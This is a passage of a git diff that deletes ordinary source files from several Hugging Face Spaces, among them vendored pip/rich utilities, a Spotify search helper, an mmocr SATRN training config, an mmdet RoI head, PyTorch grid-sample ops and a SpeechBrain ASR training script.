charset_name, - "confidence": confidence, - "language": max_prober.language, - } - - # Log all prober confidences if none met MINIMUM_THRESHOLD - if self.logger.getEffectiveLevel() <= logging.DEBUG: - if self.result["encoding"] is None: - self.logger.debug("no probers hit minimum threshold") - for group_prober in self._charset_probers: - if not group_prober: - continue - if isinstance(group_prober, CharSetGroupProber): - for prober in group_prober.probers: - self.logger.debug( - "%s %s confidence = %s", - prober.charset_name, - prober.language, - prober.get_confidence(), - ) - else: - self.logger.debug( - "%s %s confidence = %s", - group_prober.charset_name, - group_prober.language, - group_prober.get_confidence(), - ) - return self.result diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/measure.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/measure.py deleted file mode 100644 index a508ffa80bd715b47c190ed9d747dbc388fa5b19..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/measure.py +++ /dev/null @@ -1,151 +0,0 @@ -from operator import itemgetter -from typing import TYPE_CHECKING, Callable, NamedTuple, Optional, Sequence - -from . import errors -from .protocol import is_renderable, rich_cast - -if TYPE_CHECKING: - from .console import Console, ConsoleOptions, RenderableType - - -class Measurement(NamedTuple): - """Stores the minimum and maximum widths (in characters) required to render an object.""" - - minimum: int - """Minimum number of cells required to render.""" - maximum: int - """Maximum number of cells required to render.""" - - @property - def span(self) -> int: - """Get difference between maximum and minimum.""" - return self.maximum - self.minimum - - def normalize(self) -> "Measurement": - """Get measurement that ensures that minimum <= maximum and minimum >= 0 - - Returns: - Measurement: A normalized measurement. - """ - minimum, maximum = self - minimum = min(max(0, minimum), maximum) - return Measurement(max(0, minimum), max(0, max(minimum, maximum))) - - def with_maximum(self, width: int) -> "Measurement": - """Get a RenderableWith where the widths are <= width. - - Args: - width (int): Maximum desired width. - - Returns: - Measurement: New Measurement object. - """ - minimum, maximum = self - return Measurement(min(minimum, width), min(maximum, width)) - - def with_minimum(self, width: int) -> "Measurement": - """Get a RenderableWith where the widths are >= width. - - Args: - width (int): Minimum desired width. - - Returns: - Measurement: New Measurement object. - """ - minimum, maximum = self - width = max(0, width) - return Measurement(max(minimum, width), max(maximum, width)) - - def clamp( - self, min_width: Optional[int] = None, max_width: Optional[int] = None - ) -> "Measurement": - """Clamp a measurement within the specified range. - - Args: - min_width (int): Minimum desired width, or ``None`` for no minimum. Defaults to None. - max_width (int): Maximum desired width, or ``None`` for no maximum. Defaults to None. - - Returns: - Measurement: New Measurement object. - """ - measurement = self - if min_width is not None: - measurement = measurement.with_minimum(min_width) - if max_width is not None: - measurement = measurement.with_maximum(max_width) - return measurement - - @classmethod - def get( - cls, console: "Console", options: "ConsoleOptions", renderable: "RenderableType" - ) -> "Measurement": - """Get a measurement for a renderable. - - Args: - console (~rich.console.Console): Console instance. - options (~rich.console.ConsoleOptions): Console options. - renderable (RenderableType): An object that may be rendered with Rich. - - Raises: - errors.NotRenderableError: If the object is not renderable. - - Returns: - Measurement: Measurement object containing range of character widths required to render the object. - """ - _max_width = options.max_width - if _max_width < 1: - return Measurement(0, 0) - if isinstance(renderable, str): - renderable = console.render_str( - renderable, markup=options.markup, highlight=False - ) - renderable = rich_cast(renderable) - if is_renderable(renderable): - get_console_width: Optional[ - Callable[["Console", "ConsoleOptions"], "Measurement"] - ] = getattr(renderable, "__rich_measure__", None) - if get_console_width is not None: - render_width = ( - get_console_width(console, options) - .normalize() - .with_maximum(_max_width) - ) - if render_width.maximum < 1: - return Measurement(0, 0) - return render_width.normalize() - else: - return Measurement(0, _max_width) - else: - raise errors.NotRenderableError( - f"Unable to get render width for {renderable!r}; " - "a str, Segment, or object with __rich_console__ method is required" - ) - - -def measure_renderables( - console: "Console", - options: "ConsoleOptions", - renderables: Sequence["RenderableType"], -) -> "Measurement": - """Get a measurement that would fit a number of renderables. - - Args: - console (~rich.console.Console): Console instance. - options (~rich.console.ConsoleOptions): Console options. - renderables (Iterable[RenderableType]): One or more renderable objects. - - Returns: - Measurement: Measurement object containing range of character widths required to - contain all given renderables. - """ - if not renderables: - return Measurement(0, 0) - get_measurement = Measurement.get - measurements = [ - get_measurement(console, options, renderable) for renderable in renderables - ] - measured_width = Measurement( - max(measurements, key=itemgetter(0)).minimum, - max(measurements, key=itemgetter(1)).maximum, - ) - return measured_width diff --git a/spaces/RedValis/Music-Helix/spotifysearch/calls.py b/spaces/RedValis/Music-Helix/spotifysearch/calls.py deleted file mode 100644 index 3f7cb3a0d02910c3e4652f96cfec8c9adaad27cf..0000000000000000000000000000000000000000 --- a/spaces/RedValis/Music-Helix/spotifysearch/calls.py +++ /dev/null @@ -1,24 +0,0 @@ - -# THIS FILE IS RESPONSABLE FOR API CALLS - -from . import urlbuilder -from requests import get, post - - -def call_acess_token(credentials): - endpoint = 'https://accounts.spotify.com/api/token' - data = { - 'grant_type':'client_credentials' - } - headers = { - 'Authorization':f'Basic {credentials}' - } - return post(url=endpoint, data=data, headers=headers) - - -def call_search(acess_token, args): - endpoint = urlbuilder.search_endpoint(*args) - headers = { - 'Authorization':f'Bearer {acess_token}' - } - return get(url=endpoint, headers=headers) diff --git a/spaces/Riksarkivet/htr_demo/models/SATRN/_base_satrn_shallow_concat.py b/spaces/Riksarkivet/htr_demo/models/SATRN/_base_satrn_shallow_concat.py deleted file mode 100644 index ae3c825b77556566a6ca6255d4b4300ecfdf39f0..0000000000000000000000000000000000000000 --- a/spaces/Riksarkivet/htr_demo/models/SATRN/_base_satrn_shallow_concat.py +++ /dev/null @@ -1,318 +0,0 @@ -default_scope = "mmocr" -env_cfg = dict( - cudnn_benchmark=True, mp_cfg=dict(mp_start_method="fork", opencv_num_threads=0), dist_cfg=dict(backend="nccl") -) -randomness = dict(seed=None) -default_hooks = dict( - timer=dict(type="IterTimerHook"), - logger=dict(type="LoggerHook", interval=100), - param_scheduler=dict(type="ParamSchedulerHook"), - checkpoint=dict(type="CheckpointHook", interval=1), - sampler_seed=dict(type="DistSamplerSeedHook"), - sync_buffer=dict(type="SyncBuffersHook"), - visualization=dict(type="VisualizationHook", interval=1, enable=False, show=False, draw_gt=False, draw_pred=False), -) -log_level = "INFO" -log_processor = dict(type="LogProcessor", window_size=10, by_epoch=True) -load_from = ( - "/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/models/checkpoints/1700_1800_combined_satrn/epoch_5.pth" -) -resume = False -val_evaluator = dict( - type="Evaluator", - metrics=[ - dict( - type="WordMetric", - mode=["exact", "ignore_case", "ignore_case_symbol"], - valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]", - ), - dict(type="CharMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - dict(type="OneMinusNEDMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - ], -) -test_evaluator = dict( - type="Evaluator", - metrics=[ - dict( - type="WordMetric", - mode=["exact", "ignore_case", "ignore_case_symbol"], - valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]", - ), - dict(type="CharMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - dict(type="OneMinusNEDMetric", valid_symbol="[^A-Z^a-z^0-9^一-龥^å^ä^ö^Å^Ä^Ö]"), - ], -) -vis_backends = [dict(type="LocalVisBackend")] -visualizer = dict(type="TextRecogLocalVisualizer", name="visualizer", vis_backends=[dict(type="TensorboardVisBackend")]) -optim_wrapper = dict(type="OptimWrapper", optimizer=dict(type="Adam", lr=0.0003)) -train_cfg = dict(type="EpochBasedTrainLoop", max_epochs=5, val_interval=1) -val_cfg = dict(type="ValLoop") -test_cfg = dict(type="TestLoop") -param_scheduler = [dict(type="MultiStepLR", milestones=[3, 4], end=5)] -file_client_args = dict(backend="disk") -dictionary = dict( - type="Dictionary", - dict_file="./models/SATRN/dict1700.txt", - with_padding=True, - with_unknown=True, - same_start_end=True, - with_start=True, - with_end=True, -) -model = dict( - type="SATRN", - backbone=dict(type="ShallowCNN", input_channels=3, hidden_dim=512), - encoder=dict( - type="SATRNEncoder", - n_layers=12, - n_head=8, - d_k=64, - d_v=64, - d_model=512, - n_position=100, - d_inner=2048, - dropout=0.1, - ), - decoder=dict( - type="NRTRDecoder", - n_layers=6, - d_embedding=512, - n_head=8, - d_model=512, - d_inner=2048, - d_k=64, - d_v=64, - module_loss=dict(type="CEModuleLoss", flatten=True, ignore_first_char=True), - dictionary=dict( - type="Dictionary", - dict_file="./models/SATRN/dict1700.txt", - with_padding=True, - with_unknown=True, - same_start_end=True, - with_start=True, - with_end=True, - ), - max_seq_len=100, - postprocessor=dict(type="AttentionPostprocessor"), - ), - data_preprocessor=dict( - type="TextRecogDataPreprocessor", mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375] - ), -) -train_pipeline = [ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk"), ignore_empty=True, min_size=2), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), -] -test_pipeline = [ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), -] -HTR_1700_combined_train = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, -) -HTR_1700_combined_test = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_val.jsonl", - test_mode=True, - pipeline=None, -) -pr_cr_combined_train = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, -) -pr_cr_combined_test = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_eval.txt", - test_mode=True, - pipeline=None, -) -out_of_domain_1700_all_test = dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, -) -train_list = [ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, - ), - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, - ), -] -test_list = [ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) -] -train_dataset = dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, - ), - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, - ), - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk"), ignore_empty=True, min_size=2), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], -) -test_dataset = dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], -) -train_dataloader = dict( - batch_size=8, - num_workers=1, - persistent_workers=True, - sampler=dict(type="DefaultSampler", shuffle=True), - dataset=dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_HTR_shuffled_train.jsonl", - test_mode=False, - pipeline=None, - ), - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineStrParser", keys=["filename", "text"], separator="|"), - data_root="/ceph/hpc/scratch/user/euerikl/data/line_images", - ann_file="/ceph/hpc/home/euerikl/projects/htr_1800/gt_files/combined_train.txt", - test_mode=False, - pipeline=None, - ), - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk"), ignore_empty=True, min_size=2), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], - ), -) -test_dataloader = dict( - batch_size=8, - num_workers=1, - persistent_workers=True, - drop_last=False, - sampler=dict(type="DefaultSampler", shuffle=False), - dataset=dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], - ), -) -val_dataloader = dict( - batch_size=8, - num_workers=1, - persistent_workers=True, - drop_last=False, - sampler=dict(type="DefaultSampler", shuffle=False), - dataset=dict( - type="ConcatDataset", - datasets=[ - dict( - type="RecogTextDataset", - parser_cfg=dict(type="LineJsonParser", keys=["filename", "text"]), - data_root="/ceph/hpc/scratch/user/euerikl/data/HTR_1700_testsets_clean", - ann_file="/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/data/processed/1700_testsets_gt/1700_HTR_testsets_all.jsonl", - test_mode=True, - pipeline=None, - ) - ], - pipeline=[ - dict(type="LoadImageFromFile", file_client_args=dict(backend="disk")), - dict(type="Resize", scale=(400, 64), keep_ratio=False), - dict(type="LoadOCRAnnotations", with_text=True), - dict(type="PackTextRecogInputs", meta_keys=("img_path", "ori_shape", "img_shape", "valid_ratio")), - ], - ), -) -gpu_ids = range(0, 4) -cudnn_benchmark = True -work_dir = "/ceph/hpc/home/euerikl/projects/hf_openmmlab_models/models/checkpoints/1700_1800_combined_satrn" -checkpoint_config = dict(interval=1) -auto_scale_lr = dict(base_batch_size=32) -launcher = "pytorch" diff --git a/spaces/Rishwanth08/Naniai/README.md b/spaces/Rishwanth08/Naniai/README.md deleted file mode 100644 index da502257d56992dd77c716287cf5f4ffb22d0f1c..0000000000000000000000000000000000000000 --- a/spaces/Rishwanth08/Naniai/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Naniai -emoji: 🔥 -colorFrom: indigo -colorTo: purple -sdk: gradio -sdk_version: 3.39.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/pisa_roi_head.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/pisa_roi_head.py deleted file mode 100644 index e01113629837eb9c065ba40cd4025899b7bd0172..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/pisa_roi_head.py +++ /dev/null @@ -1,159 +0,0 @@ -from mmdet.core import bbox2roi -from ..builder import HEADS -from ..losses.pisa_loss import carl_loss, isr_p -from .standard_roi_head import StandardRoIHead - - -@HEADS.register_module() -class PISARoIHead(StandardRoIHead): - r"""The RoI head for `Prime Sample Attention in Object Detection - `_.""" - - def forward_train(self, - x, - img_metas, - proposal_list, - gt_bboxes, - gt_labels, - gt_bboxes_ignore=None, - gt_masks=None): - """Forward function for training. - - Args: - x (list[Tensor]): List of multi-level img features. - img_metas (list[dict]): List of image info dict where each dict - has: 'img_shape', 'scale_factor', 'flip', and may also contain - 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. - For details on the values of these keys see - `mmdet/datasets/pipelines/formatting.py:Collect`. - proposals (list[Tensors]): List of region proposals. - gt_bboxes (list[Tensor]): Each item are the truth boxes for each - image in [tl_x, tl_y, br_x, br_y] format. - gt_labels (list[Tensor]): Class indices corresponding to each box - gt_bboxes_ignore (list[Tensor], optional): Specify which bounding - boxes can be ignored when computing the loss. - gt_masks (None | Tensor) : True segmentation masks for each box - used if the architecture supports a segmentation task. - - Returns: - dict[str, Tensor]: a dictionary of loss components - """ - # assign gts and sample proposals - if self.with_bbox or self.with_mask: - num_imgs = len(img_metas) - if gt_bboxes_ignore is None: - gt_bboxes_ignore = [None for _ in range(num_imgs)] - sampling_results = [] - neg_label_weights = [] - for i in range(num_imgs): - assign_result = self.bbox_assigner.assign( - proposal_list[i], gt_bboxes[i], gt_bboxes_ignore[i], - gt_labels[i]) - sampling_result = self.bbox_sampler.sample( - assign_result, - proposal_list[i], - gt_bboxes[i], - gt_labels[i], - feats=[lvl_feat[i][None] for lvl_feat in x]) - # neg label weight is obtained by sampling when using ISR-N - neg_label_weight = None - if isinstance(sampling_result, tuple): - sampling_result, neg_label_weight = sampling_result - sampling_results.append(sampling_result) - neg_label_weights.append(neg_label_weight) - - losses = dict() - # bbox head forward and loss - if self.with_bbox: - bbox_results = self._bbox_forward_train( - x, - sampling_results, - gt_bboxes, - gt_labels, - img_metas, - neg_label_weights=neg_label_weights) - losses.update(bbox_results['loss_bbox']) - - # mask head forward and loss - if self.with_mask: - mask_results = self._mask_forward_train(x, sampling_results, - bbox_results['bbox_feats'], - gt_masks, img_metas) - losses.update(mask_results['loss_mask']) - - return losses - - def _bbox_forward(self, x, rois): - """Box forward function used in both training and testing.""" - # TODO: a more flexible way to decide which feature maps to use - bbox_feats = self.bbox_roi_extractor( - x[:self.bbox_roi_extractor.num_inputs], rois) - if self.with_shared_head: - bbox_feats = self.shared_head(bbox_feats) - cls_score, bbox_pred = self.bbox_head(bbox_feats) - - bbox_results = dict( - cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feats) - return bbox_results - - def _bbox_forward_train(self, - x, - sampling_results, - gt_bboxes, - gt_labels, - img_metas, - neg_label_weights=None): - """Run forward function and calculate loss for box head in training.""" - rois = bbox2roi([res.bboxes for res in sampling_results]) - - bbox_results = self._bbox_forward(x, rois) - - bbox_targets = self.bbox_head.get_targets(sampling_results, gt_bboxes, - gt_labels, self.train_cfg) - - # neg_label_weights obtained by sampler is image-wise, mapping back to - # the corresponding location in label weights - if neg_label_weights[0] is not None: - label_weights = bbox_targets[1] - cur_num_rois = 0 - for i in range(len(sampling_results)): - num_pos = sampling_results[i].pos_inds.size(0) - num_neg = sampling_results[i].neg_inds.size(0) - label_weights[cur_num_rois + num_pos:cur_num_rois + num_pos + - num_neg] = neg_label_weights[i] - cur_num_rois += num_pos + num_neg - - cls_score = bbox_results['cls_score'] - bbox_pred = bbox_results['bbox_pred'] - - # Apply ISR-P - isr_cfg = self.train_cfg.get('isr', None) - if isr_cfg is not None: - bbox_targets = isr_p( - cls_score, - bbox_pred, - bbox_targets, - rois, - sampling_results, - self.bbox_head.loss_cls, - self.bbox_head.bbox_coder, - **isr_cfg, - num_class=self.bbox_head.num_classes) - loss_bbox = self.bbox_head.loss(cls_score, bbox_pred, rois, - *bbox_targets) - - # Add CARL Loss - carl_cfg = self.train_cfg.get('carl', None) - if carl_cfg is not None: - loss_carl = carl_loss( - cls_score, - bbox_targets[0], - bbox_pred, - bbox_targets[2], - self.bbox_head.loss_bbox, - **carl_cfg, - num_class=self.bbox_head.num_classes) - loss_bbox.update(loss_carl) - - bbox_results.update(loss_bbox=loss_bbox) - return bbox_results diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/engine/__init__.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/engine/__init__.py deleted file mode 100644 index 3193b7f664e19ce2458d81c836597fa22e4bb082..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/engine/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from .test import (collect_results_cpu, collect_results_gpu, multi_gpu_test, - single_gpu_test) - -__all__ = [ - 'collect_results_cpu', 'collect_results_gpu', 'multi_gpu_test', - 'single_gpu_test' -] diff --git a/spaces/Rothfeld/stable-diffusion-mat-outpainting-primer/torch_utils/ops/grid_sample_gradfix.py b/spaces/Rothfeld/stable-diffusion-mat-outpainting-primer/torch_utils/ops/grid_sample_gradfix.py deleted file mode 100644 index ca6b3413ea72a734703c34382c023b84523601fd..0000000000000000000000000000000000000000 --- a/spaces/Rothfeld/stable-diffusion-mat-outpainting-primer/torch_utils/ops/grid_sample_gradfix.py +++ /dev/null @@ -1,83 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Custom replacement for `torch.nn.functional.grid_sample` that -supports arbitrarily high order gradients between the input and output. -Only works on 2D images and assumes -`mode='bilinear'`, `padding_mode='zeros'`, `align_corners=False`.""" - -import warnings -import torch - -# pylint: disable=redefined-builtin -# pylint: disable=arguments-differ -# pylint: disable=protected-access - -#---------------------------------------------------------------------------- - -enabled = False # Enable the custom op by setting this to true. - -#---------------------------------------------------------------------------- - -def grid_sample(input, grid): - if _should_use_custom_op(): - return _GridSample2dForward.apply(input, grid) - return torch.nn.functional.grid_sample(input=input, grid=grid, mode='bilinear', padding_mode='zeros', align_corners=False) - -#---------------------------------------------------------------------------- - -def _should_use_custom_op(): - if not enabled: - return False - if any(torch.__version__.startswith(x) for x in ['1.7.', '1.8.', '1.9']): - return True - warnings.warn(f'grid_sample_gradfix not supported on PyTorch {torch.__version__}. Falling back to torch.nn.functional.grid_sample().') - return False - -#---------------------------------------------------------------------------- - -class _GridSample2dForward(torch.autograd.Function): - @staticmethod - def forward(ctx, input, grid): - assert input.ndim == 4 - assert grid.ndim == 4 - output = torch.nn.functional.grid_sample(input=input, grid=grid, mode='bilinear', padding_mode='zeros', align_corners=False) - ctx.save_for_backward(input, grid) - return output - - @staticmethod - def backward(ctx, grad_output): - input, grid = ctx.saved_tensors - grad_input, grad_grid = _GridSample2dBackward.apply(grad_output, input, grid) - return grad_input, grad_grid - -#---------------------------------------------------------------------------- - -class _GridSample2dBackward(torch.autograd.Function): - @staticmethod - def forward(ctx, grad_output, input, grid): - op = torch._C._jit_get_operation('aten::grid_sampler_2d_backward') - grad_input, grad_grid = op(grad_output, input, grid, 0, 0, False) - ctx.save_for_backward(grid) - return grad_input, grad_grid - - @staticmethod - def backward(ctx, grad2_grad_input, grad2_grad_grid): - _ = grad2_grad_grid # unused - grid, = ctx.saved_tensors - grad2_grad_output = None - grad2_input = None - grad2_grid = None - - if ctx.needs_input_grad[0]: - grad2_grad_output = _GridSample2dForward.apply(grad2_grad_input, grid) - - assert not ctx.needs_input_grad[2] - return grad2_grad_output, grad2_input, grad2_grid - -#---------------------------------------------------------------------------- diff --git a/spaces/SMOOTHY1962/redstonehero-realisian_v40/README.md b/spaces/SMOOTHY1962/redstonehero-realisian_v40/README.md deleted file mode 100644 index 64f6652c299826a16f76ddb868d400c3d0795a70..0000000000000000000000000000000000000000 --- a/spaces/SMOOTHY1962/redstonehero-realisian_v40/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Redstonehero-realisian V40 -emoji: 🚀 -colorFrom: blue -colorTo: green -sdk: gradio -sdk_version: 3.32.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/SalahZa/Code-Switched-Tunisian-SpeechToText/train_mixer.py b/spaces/SalahZa/Code-Switched-Tunisian-SpeechToText/train_mixer.py deleted file mode 100644 index acac2a1e16daad18c2c182751872998cbe2c468b..0000000000000000000000000000000000000000 --- a/spaces/SalahZa/Code-Switched-Tunisian-SpeechToText/train_mixer.py +++ /dev/null @@ -1,698 +0,0 @@ -# -*- coding: utf-8 -*- - -import os -import sys -import torch -import logging -import speechbrain as sb -from speechbrain.utils.distributed import run_on_main -from hyperpyyaml import load_hyperpyyaml -from pathlib import Path -import torchaudio.transforms as T -from cv_train import ASRCV -import torchaudio -import numpy as np -import kenlm -from pyctcdecode import build_ctcdecoder -import re -from torch.nn.utils.rnn import pad_sequence -import torch.optim as optim -import torch.nn as nn - - -# Commented out IPython magic to ensure Python compatibility. -hparams_file, run_opts, overrides = sb.parse_arguments(["hparams/train_semi.yaml"]) - -# If distributed_launch=True then -# create ddp_group with the right communication protocol -sb.utils.distributed.ddp_init_group(run_opts) - -with open(hparams_file) as fin: - hparams = load_hyperpyyaml(fin, overrides) - -# Create experiment directory -sb.create_experiment_directory( - experiment_directory=hparams["output_folder"], - hyperparams_to_save=hparams_file, - overrides=overrides, -) -# Dataset prep (parsing Librispeech) - -def dataio_prepare(hparams): - """This function prepares the datasets to be used in the brain class. - It also defines the data processing pipeline through user-defined functions.""" - - # 1. Define datasets - data_folder = hparams["data_folder"] - - train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( - csv_path=hparams["train_csv"], replacements={"data_root": data_folder}, - ) - - if hparams["sorting"] == "ascending": - # we sort training data to speed up training and get better results. - train_data = train_data.filtered_sorted( - sort_key="duration", - key_max_value={"duration": hparams["avoid_if_longer_than"]}, - ) - # when sorting do not shuffle in dataloader ! otherwise is pointless - hparams["dataloader_options"]["shuffle"] = False - - elif hparams["sorting"] == "descending": - train_data = train_data.filtered_sorted( - sort_key="duration", - reverse=True, - key_max_value={"duration": hparams["avoid_if_longer_than"]}, - ) - # when sorting do not shuffle in dataloader ! otherwise is pointless - hparams["dataloader_options"]["shuffle"] = False - - elif hparams["sorting"] == "random": - pass - - else: - raise NotImplementedError( - "sorting must be random, ascending or descending" - ) - - valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( - csv_path=hparams["valid_csv"], replacements={"data_root": data_folder}, - ) - # We also sort the validation data so it is faster to validate - valid_data = valid_data.filtered_sorted(sort_key="duration") - test_datasets = {} - for csv_file in hparams["test_csv"]: - name = Path(csv_file).stem - test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( - csv_path=csv_file, replacements={"data_root": data_folder} - ) - test_datasets[name] = test_datasets[name].filtered_sorted( - sort_key="duration" - ) - - datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()] - - - # 2. Define audio pipeline: - @sb.utils.data_pipeline.takes("wav") - @sb.utils.data_pipeline.provides("sig") - def audio_pipeline(wav): - info = torchaudio.info(wav) - sig = sb.dataio.dataio.read_audio(wav) - if len(sig.shape)>1 : - sig = torch.mean(sig, dim=1) - resampled = torchaudio.transforms.Resample( - info.sample_rate, hparams["sample_rate"], - )(sig) - return resampled - - sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) - label_encoder = 